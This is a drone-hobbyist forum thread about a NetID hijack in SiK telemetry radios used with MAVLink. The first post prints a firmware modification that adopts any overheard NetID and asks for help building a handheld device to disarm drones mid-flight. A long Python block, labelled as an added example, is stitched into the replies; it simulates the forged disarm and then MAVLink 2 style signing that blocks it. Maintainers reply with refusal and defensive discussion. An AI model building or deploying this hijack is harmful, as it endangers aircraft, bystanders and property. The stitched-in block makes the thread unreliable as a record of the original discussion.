Project Status; Design
Project Progress; [∎∎∎ ]
Once the project is complete I will be publishing it here
My write-up on my Blog www.googlex.co.uk/blog...
Hello DiyDrone.com Community!
My name is Jack and I'm currently working on a project to do with an exploit recently discovered (Oct 2015) in the MAVLink protocol.
First off, the exploit:
The exploit is to do with the radios' method of authentication: they use the header 'Net_Id' to identify themselves to the other radios during transmission of data.
Within the SiK firmware for the SiLabs Si1000 ISM radio there is a file named "radio.c"; within this file there is some code that pulls the device's 'Net_Id' and checks it against incoming data packets to check if they are meant for the radio that is receiving them.
This is the original code:
    // decode the header
    errcount = golay_decode(6, buf, gout);
    if (gout[0] != netid[0] || gout[1] != netid[1]) {
        // its not for our network ID
        debug("netid %x %x\n",
              (unsigned)gout[0],
              (unsigned)gout[1]);
        goto failed;
    }
However, some guy has been able to modify this code so that when the radio receives a data packet it reads its 'Net_Id' and sets the 'Net_Id' of the radio that received the packet to the same as the one that was just received; then the radio is able
to issue a command to the drone that it has just stolen the 'Net_Id' from, such as "CMD_DISARM", which would in turn disarm the drone mid-flight!
Here is the "modified" code:
    // decode the header
    errcount = golay_decode(6, buf, gout);
    if (gout[0] != netid[0] || gout[1] != netid[1]) {
        // its not for our network ID
        /* Mod */
        // Set our radio to use the captured packet's NetID.
        // netid[] holds the 16-bit NetID little-endian (netid[0] = id & 0xFF,
        // netid[1] = id >> 8), so rebuild the full value before storing it.
        param_set(PARAM_NETID, (uint16_t)gout[0] | ((uint16_t)gout[1] << 8));
        // Save the value to flash
        param_save();
        // To read the new value we need to reboot: setting SWRSF (bit 4)
        // in RSTSRC triggers a software reset of the Si1000.
        RSTSRC |= (1 << 4);
        /* End of Mod */
    }
My problem(s) are as follows.
I can't compile the modded firmware, as all of my Linux computers refuse to install MonoDevelop :/
I would like to have this running on a standalone Hope-RF HM-TRP 433 chip that is connected to an Arduino. The Arduino would have a display so that when a button is pressed the display shows something like LINE1 "Drone-B-Gone" LINE2 "Disarming all drones in the area!", and the Arduino would use Serial.Send() to send the command to the Hope-RF chip that contains the packet "CMD_DISARM" that would disarm the quad in flight.
I have no way of flashing the Hope-RF HM-TRP chip! I read somewhere that an Arduino Uno could be used; however, I have lost that link :(
I have NO Arduino experience, so I don't even know how I would start coding something like this.
And now for my questions!
1. Can I link several HopeRF HM-TRP modules together?? What I mean by this is: could I possibly have 434/868/915 modules with the modded code all linked together with the Tx and Rx pins and the same power source (DUH, with different antennas), so that when the button is pressed, no matter what telemetry band the drone is using, it WILL cover it?
2. Can someone please send me in the right direction on how I can achieve what I have asked above with an Arduino??
All help is greatly appreciated!
Links to prior research
http://madhacker.org/how-to-hijack-a-drone-by-telemetry-and-prevent-it/
https://github.com/Dronecode/SiK
http://www.shellntel.com/blog/2015/9/25/drone-code-execution
http://rc-fpv.pl/viewtopic.php?t=8011
Obviously I am not doing this with malicious intent... ;)
Thanks a lot guys!!!
Peace out ~Jack
<-------------------------------- UPDATE-1 ----------------------------------->
Having second thoughts on how I should do this.
I am pondering whether I should use an Android tablet with a USB OTG cable.
This way (as Andre K pointed out) I would be showing more skills, as I am a confident Android developer, so I could possibly make my own app that gives me a multitude of functions such as Follow Me, Disable, Manual Control, RTH/RTL, Set New Home and Go There; also I could do flight mode changes. I think this would possibly help me demonstrate more skills?
What do you guys think? Start your response with UPDATE-1 ;)
~Jack
<------------------------------ UPDATE-1 END ------------------------------->
<-------------------------------- UPDATE-2 ----------------------------------->
Finally getting somewhere!
A HUGE thanks to Marcin Krawczyk for recommending Fedora to me!
I have finally got the HM-TRP firmware package compiled :)
It is attached below. This is the FW WITH the mod :)
LINK TO FW FILE <-- Not the correct upload!
I pulled an all-nighter doing this :S
~Jack
===
SUB UPDATE!
I accidentally uploaded the wrong file, this is the full dst output file :)
===
<------------------------------ UPDATE-2 END ------------------------------->
By Jack Rogers
© InkyHacker 2016
Replies
RECEIVED REPLY FROM TRIDGE: HE IS UNABLE TO HELP!
I think it would be more correct to say I am unwilling to help. I pointed out to Jack that this project is similar to someone pointing out that most houses in country areas don't have locks, and then proceeding to publish a housebreaking guide.
The Si1000 does not have the resources to do a properly secure protocol. Please see this work for information on what can be done on the stm32 and better processors to fix this:
https://docs.google.com/document/d/1ETle6qQRcaNWAmpG2wz0oOpFKSF_bcT...
Jack has expressed an interest in helping with that project, which I welcome. I don't think it is useful to help with a project to demonstrate how to attack drones, however.
Cheers, Tridge
Hi Tridge,
I read with interest your MAVLink 2.0 packet signing proposal.
If the problem is as serious as pointed out by Jack, and for real, are you aware of any previous attempt to take control of someone's MAVLink-flown drone by a third person?
To generate a random pair of keys and to shake hands I would suggest one-time short-range NFC pairing, since most small model drones are purchased on the go to fly after a while, so there is no time for USB cabling or entering names and numbers by an operator.
If pairing fails there must be a mechanism implemented to clear old values and to generate a new key pair.
1. NFC pairing, key pair generated, hands shaken
(NFC pairing is safe, is private, can be done indoors, at home)
2. Radio pairing is public, outdoors
My 2 cents
Could you possibly have a hardware pairing process? What I mean by this is a 2-wire comm link between the 2 radios when they are initially set up. This way both radios would be able to generate parts of a key, and only the radios have the key to decrypt the packet.
Scenario:
Radio 1 chooses the characters in RED and Radio 2 chooses the characters in BLUE
34UITH3789Y340349U65U
This way the radios have both decided on a secure key, and they will both encrypt the data and decrypt it on the transmission and arrival of the packets. Would this work???
By Jack
I will add my 2 cents to this later when I figure out how it would work! Just had a little eureka moment...
NFC pairing is fine, and could easily be used on top of the proposed signing protocol. It shouldn't be part of the protocol however, as that would preclude hardware that can't do it.
MAVLink 1.0 makes no attempt at security of any kind. It is trivial to take control if the transport is unprotected (as it is on 3DR radios). Automating it is equally trivial.
I don't know how many people have done it, but there is certainly no technical impediment.
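The two mechanisms discussed in this thread, side by side, as an added example (this is not code from the thread, from the SiK firmware or from the MAVLink project): a receiver whose only filter is the 16-bit NetID in the frame header, the "adopt whatever NetID you overhear" modification from the first post, and a MAVLink 2 style packet signature (48-bit truncated SHA-256 over a 32-byte shared secret, the packet, a link id and a 48-bit timestamp) that a NetID match alone cannot forge. Python is used rather than the radio's C so the signature arithmetic is visible. The frame layout, the `SikRadio`/`SignedReceiver` classes, the constructed key and payloads are all assumptions made for the example; a real SiK frame is Golay encoded and a real MAVLink 2 packet has a 10-byte header and CRC, which are folded into the opaque `packet` bytes here.

```python
import hashlib
import hmac
import struct


# --- 1. SiK-style NetID check (assumed simplified frame: 2-byte NetID + payload)

class SikRadio:
    """Receiver whose only filter is the 16-bit NetID in the frame header."""

    def __init__(self, netid: int, adopt_foreign_netid: bool = False):
        self.netid = netid
        self.adopt = adopt_foreign_netid   # the modification from the first post
        self.accepted = []

    def receive(self, frame: bytes) -> bool:
        # The header carries the NetID little-endian, mirroring
        # netid[0] = id & 0xFF; netid[1] = id >> 8 in the firmware.
        rx_netid = struct.unpack_from("<H", frame, 0)[0]
        if rx_netid != self.netid:
            if self.adopt:
                # The mod: take on the NetID just overheard. The firmware saves
                # it to flash and reboots; here the radio simply switches.
                self.netid = rx_netid
            return False                   # the firmware's "goto failed"
        self.accepted.append(frame[2:])
        return True


def build_frame(netid: int, payload: bytes) -> bytes:
    return struct.pack("<H", netid) + payload


# --- 2. MAVLink 2 style signing: packet || link_id(1) || timestamp(6) || sig(6)

SIG_TRAILER_LEN = 13


def sign(secret_key: bytes, packet: bytes, link_id: int, timestamp: int) -> bytes:
    """Append link id, 48-bit timestamp and sha256_48(key+packet+link_id+ts)."""
    assert len(secret_key) == 32 and 0 <= timestamp < (1 << 48)
    trailer = bytes([link_id]) + timestamp.to_bytes(6, "little")
    sig = hashlib.sha256(secret_key + packet + trailer).digest()[:6]
    return packet + trailer + sig


class SignedReceiver:
    """Accepts a packet only if the signature matches and the timestamp is new."""

    def __init__(self, secret_key: bytes):
        self.key = secret_key
        self.last_ts = {}                  # link_id -> highest timestamp seen

    def verify(self, signed: bytes) -> bool:
        if len(signed) < SIG_TRAILER_LEN:
            return False
        packet, trailer = signed[:-SIG_TRAILER_LEN], signed[-SIG_TRAILER_LEN:]
        link_id, ts = trailer[0], int.from_bytes(trailer[1:7], "little")
        expected = hashlib.sha256(self.key + packet + trailer[:7]).digest()[:6]
        if not hmac.compare_digest(expected, trailer[7:]):
            return False                   # wrong key or altered packet
        # Simplified replay rule: timestamp must advance per link id.
        if ts <= self.last_ts.get(link_id, -1):
            return False
        self.last_ts[link_id] = ts
        return True


def demo() -> dict:
    """Constructed scenario: an overheard frame, a forged command, then signing."""
    key = bytes(range(32))                 # constructed shared secret
    drone = SikRadio(netid=25)
    attacker = SikRadio(netid=7, adopt_foreign_netid=True)

    legit = build_frame(25, b"HEARTBEAT")  # operator's ground station frame
    drone.receive(legit)
    attacker.receive(legit)                # mismatch, but the NetID is adopted

    forged = build_frame(attacker.netid, b"CMD_DISARM")
    netid_check_passes = drone.receive(forged)

    rx = SignedReceiver(key)
    genuine = sign(key, b"CMD_DISARM", link_id=0, timestamp=1000)
    forged_signed = sign(bytes(32), b"CMD_DISARM", link_id=0, timestamp=1001)
    return {
        "attacker_netid": attacker.netid,
        "netid_check_passes": netid_check_passes,
        "genuine_accepted": rx.verify(genuine),
        "replay_accepted": rx.verify(genuine),
        "forged_accepted": rx.verify(forged_signed),
    }


if __name__ == "__main__":
    print(demo())
```

The first half shows why the radio-level check is an address, not an authentication: one overheard frame hands the attacker everything needed to pass it. The second half shows that once the receiver demands a keyed signature, a matching NetID and a copied payload are not enough, and a captured genuine packet cannot be replayed either.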
Thanks Again Tridge :)
I have also emailed him at 3 separate email addresses I found for him, as I don't know which ones are active!
~Jack
Thanks a lot man :D